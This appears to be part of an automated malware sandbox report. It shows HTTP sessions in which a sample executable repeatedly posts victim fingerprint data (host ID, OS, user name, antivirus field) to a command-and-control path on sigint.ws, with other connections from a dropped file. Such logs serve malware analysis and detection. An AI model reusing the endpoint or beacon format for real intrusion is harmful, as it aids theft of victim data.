                                                                              Jun 2, 2022 01:54:07.904081106 CEST | 3419 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              24 | 192.168.2.4 | 49798 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:08.357861996 CEST | 3419 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:08.537884951 CEST | 3419 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              25 | 192.168.2.4 | 49799 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:08.864610910 CEST | 3420 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:09.051507950 CEST | 3420 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              26 | 192.168.2.4 | 49800 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:09.502749920 CEST | 3421 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:09.686487913 CEST | 3421 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              27 | 192.168.2.4 | 49801 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:10.166146994 CEST | 3422 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:10.346992016 CEST | 3422 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              28 | 192.168.2.4 | 49802 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:10.716389894 CEST | 3423 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:10.897917032 CEST | 3423 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              29 | 192.168.2.4 | 49803 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:11.166089058 CEST | 3424 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:11.350131989 CEST | 3424 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              3 | 192.168.2.4 | 49782 | 172.67.152.230 | 443 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              30 | 192.168.2.4 | 49804 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:11.691875935 CEST | 3425 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:11.876013041 CEST | 3425 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              31 | 192.168.2.4 | 49805 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:12.457299948 CEST | 3426 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:12.640063047 CEST | 3426 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              32 | 192.168.2.4 | 49806 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:12.991151094 CEST | 3427 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:13.170902014 CEST | 3427 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              33 | 192.168.2.4 | 49807 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:13.581561089 CEST | 3428 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:13.761343002 CEST | 3428 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              34 | 192.168.2.4 | 49808 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:14.080650091 CEST | 3428 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:14.265993118 CEST | 3429 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              35 | 192.168.2.4 | 49809 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:14.556780100 CEST | 3429 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:14.736346960 CEST | 3430 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              36 | 192.168.2.4 | 49810 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:15.300527096 CEST | 3430 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:15.483221054 CEST | 3431 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              37 | 192.168.2.4 | 49811 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:15.765337944 CEST | 3431 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:15.946785927 CEST | 3432 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              38 | 192.168.2.4 | 49812 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:16.364540100 CEST | 3432 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:16.544522047 CEST | 3432 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              39 | 192.168.2.4 | 49813 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:16.846545935 CEST | 3433 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:17.025465965 CEST | 3433 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              4 | 192.168.2.4 | 49893 | 149.154.167.99 | 443 | C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              Timestamp | kBytes transferred | Direction | Data


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              40 | 192.168.2.4 | 49814 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:17.528471947 CEST | 3434 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:17.710797071 CEST | 3434 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:17 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              41 | 192.168.2.4 | 49815 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:18.395076036 CEST | 3435 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:18.579144001 CEST | 3435 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              42 | 192.168.2.4 | 49816 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:18.919404984 CEST | 3436 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:19.103904963 CEST | 3436 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:19 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
